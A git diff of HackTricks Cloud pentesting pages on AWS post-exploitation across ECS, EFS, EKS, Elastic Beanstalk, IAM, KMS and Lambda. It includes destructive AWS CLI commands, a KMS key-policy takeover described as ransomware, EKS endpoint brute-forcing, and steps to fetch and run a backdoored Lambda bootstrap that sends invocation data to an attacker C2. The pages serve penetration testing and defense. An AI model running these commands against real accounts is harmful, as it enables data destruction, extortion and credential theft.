-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## ECR For more information check -{% content-ref url="../aws-services/aws-ecr-enum.md" %} -[aws-ecr-enum.md](../aws-services/aws-ecr-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-services/aws-ecr-enum.md +{{#endref}} ### Login, Pull & Push -{% code overflow="wrap" %} ```bash # Docker login into ecr ## For public repo (always use us-east-1) @@ -38,7 +24,7 @@ aws ecr get-login-password --profile --region | docker l docker pull .dkr.ecr..amazonaws.com/:latest ## If you still have the error "Requested image not found" ## It might be because the tag "latest" doesn't exit -## Get valid tags with: +## Get valid tags with: TOKEN=$(aws --profile ecr get-authorization-token --output text --query 'authorizationData[].authorizationToken') curl -i -H "Authorization: Basic $TOKEN" https://.dkr.ecr..amazonaws.com/v2//tags/list @@ -61,11 +47,12 @@ aws ecr get-download-url-for-layer \ --registry-id 653711331788 \ --layer-digest "sha256:edfaad38ac10904ee76c81e343abf88f22e6cfc7413ab5a8e4aeffc6a7d9087a" ``` -{% endcode %} After downloading the images you should **check them for sensitive info**: -{% embed url="https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics" %} +{{#ref}} +https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics +{{#endref}} ### `ecr:PutLifecyclePolicy` | `ecr:DeleteRepository` | `ecr-public:DeleteRepository` | `ecr:BatchDeleteImage` | `ecr-public:BatchDeleteImage` 
@@ -106,17 +93,4 @@ aws ecr batch-delete-image --repository-name your-ecr-repo-name --image-ids imag aws ecr-public batch-delete-image --repository-name your-ecr-repo-name --image-ids imageTag=latest imageTag=v1.0.0 ``` -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md new file mode 100644 index 000000000..115f36302 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md 
@@ -0,0 +1,63 @@
+# AWS - ECS Post Exploitation
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## ECS
+
+For more information check:
+
+{{#ref}}
+../aws-services/aws-ecs-enum.md
+{{#endref}}
+
+### Host IAM Roles
+
+In ECS an **IAM role can be assigned to the task** running inside the container. **If** the task is run inside an **EC2** instance, the **EC2 instance** will have **another IAM** role attached to it.\
+Which means that if you manage to **compromise** an ECS instance you can potentially **obtain the IAM role associated to the ECR and to the EC2 instance**. For more info about how to get those credentials check:
+
+{{#ref}}
+https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf
+{{#endref}}
+
+> [!CAUTION]
+> Note that if the EC2 instance is enforcing IMDSv2, [**according to the docs**](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-metadata-v2-how-it-works.html), the **response of the PUT request** will have a **hop limit of 1**, making impossible to access the EC2 metadata from a container inside the EC2 instance.
+
+### Privesc to node to steal other containers creds & secrets
+
+But moreover, EC2 uses docker to run ECs tasks, so if you can escape to the node or **access the docker socket**, you can **check** which **other containers** are being run, and even **get inside of them** and **steal their IAM roles** attached.
+
+#### Making containers run in current host
+
+Furthermore, the **EC2 instance role** will usually have enough **permissions** to **update the container instance state** of the EC2 instances being used as nodes inside the cluster. An attacker could modify the **state of an instance to DRAINING**, then ECS will **remove all the tasks from it** and the ones being run as **REPLICA** will be **run in a different instance,** potentially inside the **attackers instance** so he can **steal their IAM roles** and potential sensitive info from inside the container.
+
+```bash
+aws ecs update-container-instances-state \
+ --cluster --status DRAINING --container-instances
+```
+
+The same technique can be done by **deregistering the EC2 instance from the cluster**. This is potentially less stealthy but it will **force the tasks to be run in other instances:**
+
+```bash
+aws ecs deregister-container-instance \
+ --cluster --container-instance --force
+```
+
+A final technique to force the re-execution of tasks is by indicating ECS that the **task or container was stopped**. There are 3 potential APIs to do this:
+
+```bash
+# Needs: ecs:SubmitTaskStateChange
+aws ecs submit-task-state-change --cluster \
+ --status STOPPED --reason "anything" --containers [...]
+
+# Needs: ecs:SubmitContainerStateChange
+aws ecs submit-container-state-change ...
+
+# Needs: ecs:SubmitAttachmentStateChanges
+aws ecs submit-attachment-state-changes ...
+```
+
+### Steal sensitive info from ECR containers
+
+The EC2 instance will probably also have the permission `ecr:GetAuthorizationToken` allowing it to **download images** (you could search for sensitive info in them).
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.md
new file mode 100644
index 000000000..daf1fb898
--- /dev/null
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.md
@@ -0,0 +1,54 @@
+# AWS - EFS Post Exploitation
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## EFS
+
+For more information check:
+
+{{#ref}}
+../aws-services/aws-efs-enum.md
+{{#endref}}
+
+### `elasticfilesystem:DeleteMountTarget`
+
+An attacker could delete a mount target, potentially disrupting access to the EFS file system for applications and users relying on that mount target.
+
+```sql
+aws efs delete-mount-target --mount-target-id
+```
+
+**Potential Impact**: Disruption of file system access and potential data loss for users or applications.
+
+### `elasticfilesystem:DeleteFileSystem`
+
+An attacker could delete an entire EFS file system, which could lead to data loss and impact applications relying on the file system.
+
+```perl
+aws efs delete-file-system --file-system-id
+```
+
+**Potential Impact**: Data loss and service disruption for applications using the deleted file system.
+
+### `elasticfilesystem:UpdateFileSystem`
+
+An attacker could update the EFS file system properties, such as throughput mode, to impact its performance or cause resource exhaustion.
+
+```sql
+aws efs update-file-system --file-system-id --provisioned-throughput-in-mibps
+```
+
+**Potential Impact**: Degradation of file system performance or resource exhaustion.
+
+### `elasticfilesystem:CreateAccessPoint` and `elasticfilesystem:DeleteAccessPoint`
+
+An attacker could create or delete access points, altering access control and potentially granting themselves unauthorized access to the file system.
+
+```arduino
+aws efs create-access-point --file-system-id --posix-user --root-directory
+aws efs delete-access-point --access-point-id
+```
+
+**Potential Impact**: Unauthorized access to the file system, data exposure or modification.
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.md similarity index 50% rename from pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.md rename to src/pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.md index 3421ae7cc..90c8a2c96 100644 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.md @@ -1,27 +1,14 @@ # AWS - EKS Post Exploitation -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## EKS For mor information check -{% content-ref url="../aws-services/aws-eks-enum.md" %} -[aws-eks-enum.md](../aws-services/aws-eks-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-services/aws-eks-enum.md +{{#endref}} ### Enumerate the cluster from the AWS Console 
@@ -29,26 +16,24 @@ If you have the permission **`eks:AccessKubernetesApi`** you can **view Kubernet ### Connect to AWS Kubernetes Cluster -* Easy way: +- Easy way: ```bash # Generate kubeconfig aws eks update-kubeconfig --name aws-eks-dev ``` -* Not that easy way: +- Not that easy way: If you can **get a token** with **`aws eks get-token --name `** but you don't have permissions to get cluster info (describeCluster), you could **prepare your own `~/.kube/config`**. However, having the token, you still need the **url endpoint to connect to** (if you managed to get a JWT token from a pod read [here](aws-eks-post-exploitation.md#get-api-server-endpoint-from-a-jwt-token)) and the **name of the cluster**. In my case, I didn't find the info in CloudWatch logs, but I **found it in LaunchTemaplates userData** and in **EC2 machines in userData also**. You can see this info in **userData** easily, for example in the next example (the cluster name was cluster-name): -{% code overflow="wrap" %} ```bash API_SERVER_URL=https://6253F6CA47F81264D8E16FAA7A103A0D.gr7.us-east-1.eks.amazonaws.com /etc/eks/bootstrap.sh cluster-name --kubelet-extra-args '--node-labels=eks.amazonaws.com/sourceLaunchTemplateVersion=1,alpha.eksctl.io/cluster-name=cluster-name,alpha.eksctl.io/nodegroup-name=prd-ondemand-us-west-2b,role=worker,eks.amazonaws.com/nodegroup-image=ami-002539dd2c532d0a5,eks.amazonaws.com/capacityType=ON_DEMAND,eks.amazonaws.com/nodegroup=prd-ondemand-us-west-2b,type=ondemand,eks.amazonaws.com/sourceLaunchTemplateId=lt-0f0f0ba62bef782e5 --max-pods=58' --b64-cluster-ca $B64_CLUSTER_CA --apiserver-endpoint $API_SERVER_URL --dns-cluster-ip $K8S_CLUSTER_DNS_IP --use-max-pods false ``` -{% endcode %}
@@ -57,36 +42,36 @@ API_SERVER_URL=https://6253F6CA47F81264D8E16FAA7A103A0D.gr7.us-east-1.eks.amazon ```yaml describe-cache-parametersapiVersion: v1 clusters: -- cluster: - certificate-authority-data: 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 - server: https://6253F6CA47F81264D8E16FAA7A103A0D.gr7.us-west-2.eks.amazonaws.com - name: arn:aws:eks:us-east-1::cluster/ + - cluster: + certificate-authority-data: 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 + server: https://6253F6CA47F81264D8E16FAA7A103A0D.gr7.us-west-2.eks.amazonaws.com + name: arn:aws:eks:us-east-1::cluster/ contexts: -- context: - cluster: arn:aws:eks:us-east-1::cluster/ - user: arn:aws:eks:us-east-1::cluster/ - name: arn:aws:eks:us-east-1::cluster/ + - context: + cluster: arn:aws:eks:us-east-1::cluster/ + user: arn:aws:eks:us-east-1::cluster/ + name: arn:aws:eks:us-east-1::cluster/ current-context: arn:aws:eks:us-east-1::cluster/ kind: Config preferences: {} users: -- name: arn:aws:eks:us-east-1::cluster/ - user: - exec: - apiVersion: client.authentication.k8s.io/v1beta1 - args: - - --region - - us-west-2 - - --profile - - - - eks - - get-token - - --cluster-name - - - command: aws - env: null - interactiveMode: IfAvailable - provideClusterInfo: false + - name: arn:aws:eks:us-east-1::cluster/ + user: + exec: + apiVersion: client.authentication.k8s.io/v1beta1 + args: + - --region + - us-west-2 + - --profile + - + - eks + - get-token + - --cluster-name + - + command: aws + env: null + interactiveMode: IfAvailable + provideClusterInfo: false ```
@@ -97,9 +82,8 @@ The **creator** of the **EKS cluster** is **ALWAYS** going to be able to get int The way to grant **access to over K8s to more AWS IAM users or roles** is using the **configmap** **`aws-auth`**. -{% hint style="warning" %} -Therefore, anyone with **write access** over the config map **`aws-auth`** will be able to **compromise the whole cluster**. -{% endhint %} +> [!WARNING] +> Therefore, anyone with **write access** over the config map **`aws-auth`** will be able to **compromise the whole cluster**. For more information about how to **grant extra privileges to IAM roles & users** in the **same or different account** and how to **abuse** this to [**privesc check this page**](../../kubernetes-security/abusing-roles-clusterroles-in-kubernetes/#aws-eks-aws-auth-configmaps). @@ -119,8 +103,8 @@ https://...eks.amazonaws.com Didn't find any documentation that explain the criteria for the 'two chars' and the 'number'. But making some test on my behalf I see recurring these one: -* gr7 -* yl4 +- gr7 +- yl4 Anyway are just 3 chars we can bruteforce them. Use the below script for generating the list @@ -146,9 +130,8 @@ Then with wfuzz wfuzz -Z -z file,out.txt --hw 0 https://.FUZZ..eks.amazonaws.com ``` -{% hint style="warning" %} -Remember to replace & . -{% endhint %} +> [!WARNING] +> Remember to replace & . ### Bypass CloudTrail 
@@ -164,23 +147,9 @@ By default the **user or role that created** a cluster is **ALWAYS going to have So, if an **attacker compromises a cluster using fargate** and **removes all the other admins** and d**eletes the AWS user/role that created** the Cluster, ~~the attacker could have **ransomed the cluste**~~**r**. -{% hint style="success" %} -Note that if the cluster was using **EC2 VMs**, it could be possible to get Admin privileges from the **Node** and recover the cluster. +> [!TIP] +> Note that if the cluster was using **EC2 VMs**, it could be possible to get Admin privileges from the **Node** and recover the cluster. +> +> Actually, If the cluster is using Fargate you could EC2 nodes or move everything to EC2 to the cluster and recover it accessing the tokens in the node. -Actually, If the cluster is using Fargate you could EC2 nodes or move everything to EC2 to the cluster and recover it accessing the tokens in the node. -{% endhint %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md new file mode 100644 index 000000000..59b9fd453 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md 
@@ -0,0 +1,80 @@
+# AWS - Elastic Beanstalk Post Exploitation
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Elastic Beanstalk
+
+For more information:
+
+{{#ref}}
+../aws-services/aws-elastic-beanstalk-enum.md
+{{#endref}}
+
+### `elasticbeanstalk:DeleteApplicationVersion`
+
+> [!NOTE]
+> TODO: Test if more permissions are required for this
+
+An attacker with the permission `elasticbeanstalk:DeleteApplicationVersion` can **delete an existing application version**. This action could disrupt application deployment pipelines or cause loss of specific application versions if not backed up.
+
+```bash
+aws elasticbeanstalk delete-application-version --application-name my-app --version-label my-version
+```
+
+**Potential Impact**: Disruption of application deployment and potential loss of application versions.
+
+### `elasticbeanstalk:TerminateEnvironment`
+
+> [!NOTE]
+> TODO: Test if more permissions are required for this
+
+An attacker with the permission `elasticbeanstalk:TerminateEnvironment` can **terminate an existing Elastic Beanstalk environment**, causing downtime for the application and potential data loss if the environment is not configured for backups.
+
+```bash
+aws elasticbeanstalk terminate-environment --environment-name my-existing-env
+```
+
+**Potential Impact**: Downtime of the application, potential data loss, and disruption of services.
+
+### `elasticbeanstalk:DeleteApplication`
+
+> [!NOTE]
+> TODO: Test if more permissions are required for this
+
+An attacker with the permission `elasticbeanstalk:DeleteApplication` can **delete an entire Elastic Beanstalk application**, including all its versions and environments. This action could cause a significant loss of application resources and configurations if not backed up.
+
+```bash
+aws elasticbeanstalk delete-application --application-name my-app --terminate-env-by-force
+```
+
+**Potential Impact**: Loss of application resources, configurations, environments, and application versions, leading to service disruption and potential data loss.
+
+### `elasticbeanstalk:SwapEnvironmentCNAMEs`
+
+> [!NOTE]
+> TODO: Test if more permissions are required for this
+
+An attacker with the `elasticbeanstalk:SwapEnvironmentCNAMEs` permission can **swap the CNAME records of two Elastic Beanstalk environments**, which might cause the wrong version of the application to be served to users or lead to unintended behavior.
+
+```bash
+aws elasticbeanstalk swap-environment-cnames --source-environment-name my-env-1 --destination-environment-name my-env-2
+```
+
+**Potential Impact**: Serving the wrong version of the application to users or causing unintended behavior in the application due to swapped environments.
+
+### `elasticbeanstalk:AddTags`, `elasticbeanstalk:RemoveTags`
+
+> [!NOTE]
+> TODO: Test if more permissions are required for this
+
+An attacker with the `elasticbeanstalk:AddTags` and `elasticbeanstalk:RemoveTags` permissions can **add or remove tags on Elastic Beanstalk resources**. This action could lead to incorrect resource allocation, billing, or resource management.
+
+```bash
+aws elasticbeanstalk add-tags --resource-arn arn:aws:elasticbeanstalk:us-west-2:123456789012:environment/my-app/my-env --tags Key=MaliciousTag,Value=1
+
+aws elasticbeanstalk remove-tags --resource-arn arn:aws:elasticbeanstalk:us-west-2:123456789012:environment/my-app/my-env --tag-keys MaliciousTag
+```
+
+**Potential Impact**: Incorrect resource allocation, billing, or resource management due to added or removed tags.
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.md new file mode 100644 index 000000000..f364899bb --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.md @@ -0,0 +1,103 @@ +# AWS - IAM Post Exploitation + +{{#include ../../../banners/hacktricks-training.md}} + +## IAM + +For more information about IAM access: + +{{#ref}} +../aws-services/aws-iam-enum.md +{{#endref}} + +## Confused Deputy Problem + +If you **allow an external account (A)** to access a **role** in your account, you will probably have **0 visibility** on **who can exactly access that external account**. This is a problem, because if another external account (B) can access the external account (A) it's possible that **B will also be able to access your account**. + +Therefore, when allowing an external account to access a role in your account it's possible to specify an `ExternalId`. This is a "secret" string that the external account (A) **need to specify** in order to **assume the role in your organization**. As the **external account B won't know this string**, even if he has access over A he **won't be able to access your role**. + +
+ +However, note that this `ExternalId` "secret" is **not a secret**, anyone that can **read the IAM assume role policy will be able to see it**. But as long as the external account A knows it, but the external account **B doesn't know it**, it **prevents B abusing A to access your role**. + +Example: + +```json +{ + "Version": "2012-10-17", + "Statement": { + "Effect": "Allow", + "Principal": { + "AWS": "Example Corp's AWS Account ID" + }, + "Action": "sts:AssumeRole", + "Condition": { + "StringEquals": { + "sts:ExternalId": "12345" + } + } + } +} +``` + +> [!WARNING] +> For an attacker to exploit a confused deputy he will need to find somehow if principals of the current account can impersonate roles in other accounts. + +### Unexpected Trusts + +#### Wildcard as principal + +```json +{ + "Action": "sts:AssumeRole", + "Effect": "Allow", + "Principal": { "AWS": "*" } +} +``` + +This policy **allows all AWS** to assume the role. + +#### Service as principal + +```json +{ + "Action": "lambda:InvokeFunction", + "Effect": "Allow", + "Principal": { "Service": "apigateway.amazonaws.com" }, + "Resource": "arn:aws:lambda:000000000000:function:foo" +} +``` + +This policy **allows any account** to configure their apigateway to call this Lambda. + +#### S3 as principal + +```json +"Condition": { +"ArnLike": { "aws:SourceArn": "arn:aws:s3:::source-bucket" }, + "StringEquals": { + "aws:SourceAccount": "123456789012" + } +} +``` + +If an S3 bucket is given as a principal, because S3 buckets do not have an Account ID, if you **deleted your bucket and the attacker created** it in their own account, then they could abuse this. + +#### Not supported + +```json +{ + "Effect": "Allow", + "Principal": { "Service": "cloudtrail.amazonaws.com" }, + "Action": "s3:PutObject", + "Resource": "arn:aws:s3:::myBucketName/AWSLogs/MY_ACCOUNT_ID/*" +} +``` + +A common way to avoid Confused Deputy problems is the use of a condition with `AWS:SourceArn` to check the origin ARN. 
However, **some services might not support that** (like CloudTrail according to some sources). + +## References + +- [https://docs.aws.amazon.com/IAM/latest/UserGuide/confused-deputy.html](https://docs.aws.amazon.com/IAM/latest/UserGuide/confused-deputy.html) + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.md new file mode 100644 index 000000000..e03c8a315 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.md 
@@ -0,0 +1,133 @@ +# AWS - KMS Post Exploitation + +{{#include ../../../banners/hacktricks-training.md}} + +## KMS + +For more information check: + +{{#ref}} +../aws-services/aws-kms-enum.md +{{#endref}} + +### Encrypt/Decrypt information + +`fileb://` and `file://` are URI schemes used in AWS CLI commands to specify the path to local files: + +- `fileb://:` Reads the file in binary mode, commonly used for non-text files. +- `file://:` Reads the file in text mode, typically used for plain text files, scripts, or JSON that doesn't have special encoding requirements. + +> [!TIP] +> Note that if you want to decrypt some data inside a file, the file must contain the binary data, not base64 encoded data. (fileb://) + +- Using a **symmetric** key + +```bash +# Encrypt data +aws kms encrypt \ + --key-id f0d3d719-b054-49ec-b515-4095b4777049 \ + --plaintext fileb:///tmp/hello.txt \ + --output text \ + --query CiphertextBlob | base64 \ + --decode > ExampleEncryptedFile + +# Decrypt data +aws kms decrypt \ + --ciphertext-blob fileb://ExampleEncryptedFile \ + --key-id f0d3d719-b054-49ec-b515-4095b4777049 \ + --output text \ + --query Plaintext | base64 \ + --decode +``` + +- Using a **asymmetric** key: + +```bash +# Encrypt data +aws kms encrypt \ + --key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \ + --encryption-algorithm RSAES_OAEP_SHA_256 \ + --plaintext fileb:///tmp/hello.txt \ + --output text \ + --query CiphertextBlob | base64 \ + --decode > ExampleEncryptedFile + +# Decrypt data +aws kms decrypt \ + --ciphertext-blob fileb://ExampleEncryptedFile \ + --encryption-algorithm RSAES_OAEP_SHA_256 \ + --key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \ + --output text \ + --query Plaintext | base64 \ + --decode +``` + +### KMS Ransomware + +An attacker with privileged access over KMS could modify the KMS policy of keys and **grant his account access over them**, removing the access granted to the legit account. 
+ +Then, the legit account users won't be able to access any informatcion of any service that has been encrypted with those keys, creating an easy but effective ransomware over the account. + +> [!WARNING] +> Note that **AWS managed keys aren't affected** by this attack, only **Customer managed keys**. + +> Also note the need to use the param **`--bypass-policy-lockout-safety-check`** (the lack of this option in the web console makes this attack only possible from the CLI). + +```bash +# Force policy change +aws kms put-key-policy --key-id mrk-c10357313a644d69b4b28b88523ef20c \ + --policy-name default \ + --policy file:///tmp/policy.yaml \ + --bypass-policy-lockout-safety-check + +{ + "Id": "key-consolepolicy-3", + "Version": "2012-10-17", + "Statement": [ + { + "Sid": "Enable IAM User Permissions", + "Effect": "Allow", + "Principal": { + "AWS": "arn:aws:iam:::root" + }, + "Action": "kms:*", + "Resource": "*" + } + ] +} +``` + +> [!CAUTION] +> Note that if you change that policy and only give access to an external account, and then from this external account you try to set a new policy to **give the access back to original account, you won't be able**. + +
+ +### Generic KMS Ransomware + +#### Global KMS Ransomware + +There is another way to perform a global KMS Ransomware, which would involve the following steps: + +- Create a new **key with a key material** imported by the attacker +- **Re-encrypt older data** encrypted with the previous version with the new one. +- **Delete the KMS key** +- Now only the attacker, who has the original key material could be able to decrypt the encrypted data + +### Destroy keys + +```bash +# Destoy they key material previously imported making the key useless +aws kms delete-imported-key-material --key-id 1234abcd-12ab-34cd-56ef-1234567890ab + +# Schedule the destoy of a key (min wait time is 7 days) +aws kms schedule-key-deletion \ + --key-id arn:aws:kms:us-west-2:123456789012:key/1234abcd-12ab-34cd-56ef-1234567890ab \ + --pending-window-in-days 7 +``` + +> [!CAUTION] +> Note that AWS now **prevents the previous actions from being performed from a cross account:** + +
+ +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md new file mode 100644 index 000000000..86bc91b90 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md @@ -0,0 +1,29 @@ +# AWS - Lambda Post Exploitation + +{{#include ../../../../banners/hacktricks-training.md}} + +## Lambda + +For more information check: + +{{#ref}} +../../aws-services/aws-lambda-enum.md +{{#endref}} + +### Steal Others Lambda URL Requests + +If an attacker somehow manage to get RCE inside a Lambda he will be able to steal other users HTTP requests to the lambda. If the requests contain sensitive information (cookies, credentials...) he will be able to steal them. + +{{#ref}} +aws-warm-lambda-persistence.md +{{#endref}} + +### Steal Others Lambda URL Requests & Extensions Requests + +Abusing Lambda Layers it's also possible to abuse extensions and persist in the lambda but also steal and modify requests. + +{{#ref}} +../../aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md +{{#endref}} + +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md new file mode 100644 index 000000000..1aa0d0334 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md @@ -0,0 +1,63 @@ +# AWS - Steal Lambda Requests + +{{#include ../../../../banners/hacktricks-training.md}} + +## Lambda Flow + +

https://unit42.paloaltonetworks.com/wp-content/uploads/2019/10/lambda_poc_2_arch.png

+ +1. **Slicer** is a process outside the container that **send** **invocations** to the **init** process. +2. The init process listens on port **9001** exposing some interesting endpoints: + - **`/2018-06-01/runtime/invocation/next`** – get the next invocation event + - **`/2018-06-01/runtime/invocation/{invoke-id}/response`** – return the handler response for the invoke + - **`/2018-06-01/runtime/invocation/{invoke-id}/error`** – return an execution error +3. **bootstrap.py** has a loop getting invocations from the init process and calls the users code to handle them (**`/next`**). +4. Finally, **bootstrap.py** sends to init the **response** + +Note that bootstrap loads the user code as a module, so any code execution performed by the users code is actually happening in this process. + +## Stealing Lambda Requests + +The goal of this attack is to make the users code execute a malicious **`bootstrap.py`** process inside the **`bootstrap.py`** process that handle the vulnerable request. This way, the **malicious bootstrap** process will start **talking with the init process** to handle the requests while the **legit** bootstrap is **trapped** running the malicious one, so it won't ask for requests to the init process. + +This is a simple task to achieve as the code of the user is being executed by the legit **`bootstrap.py`** process. So the attacker could: + +- **Send a fake result of the current invocation to the init process**, so init thinks the bootstrap process is waiting for more invocations. 
+ - A request must be sent to **`/${invoke-id}/response`** + - The invoke-id can be obtained from the stack of the legit **`bootstrap.py`** process using the [**inspect**](https://docs.python.org/3/library/inspect.html) python module (as [proposed here](https://github.com/twistlock/lambda-persistency-poc/blob/master/poc/switch_runtime.py)) or just requesting it again to **`/2018-06-01/runtime/invocation/next`** (as [proposed here](https://github.com/Djkusik/serverless_persistency_poc/blob/master/gcp/exploit_files/switcher.py)). +- Execute a malicious **`boostrap.py`** which will handle the next invocations + - For stealthiness purposes it's possible to send the lambda invocations parameters to an attackers controlled C2 and then handle the requests as usual. + - For this attack, it's enough to get the original code of **`bootstrap.py`** from the system or [**github**](https://github.com/aws/aws-lambda-python-runtime-interface-client/blob/main/awslambdaric/bootstrap.py), add the malicious code and run it from the current lambda invocation. + +### Attack Steps + +1. Find a **RCE** vulnerability. +2. Generate a **malicious** **bootstrap** (e.g. [https://raw.githubusercontent.com/carlospolop/lambda_bootstrap_switcher/main/backdoored_bootstrap.py](https://raw.githubusercontent.com/carlospolop/lambda_bootstrap_switcher/main/backdoored_bootstrap.py)) +3. **Execute** the malicious bootstrap. + +You can easily perform these actions running: + +```bash +python3 < --region +``` + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.md similarity index 55% rename from pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.md rename to src/pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.md index 1e45f292d..dd6517e80 100644 
--- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.md @@ -1,27 +1,14 @@ # AWS - RDS Post Exploitation -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
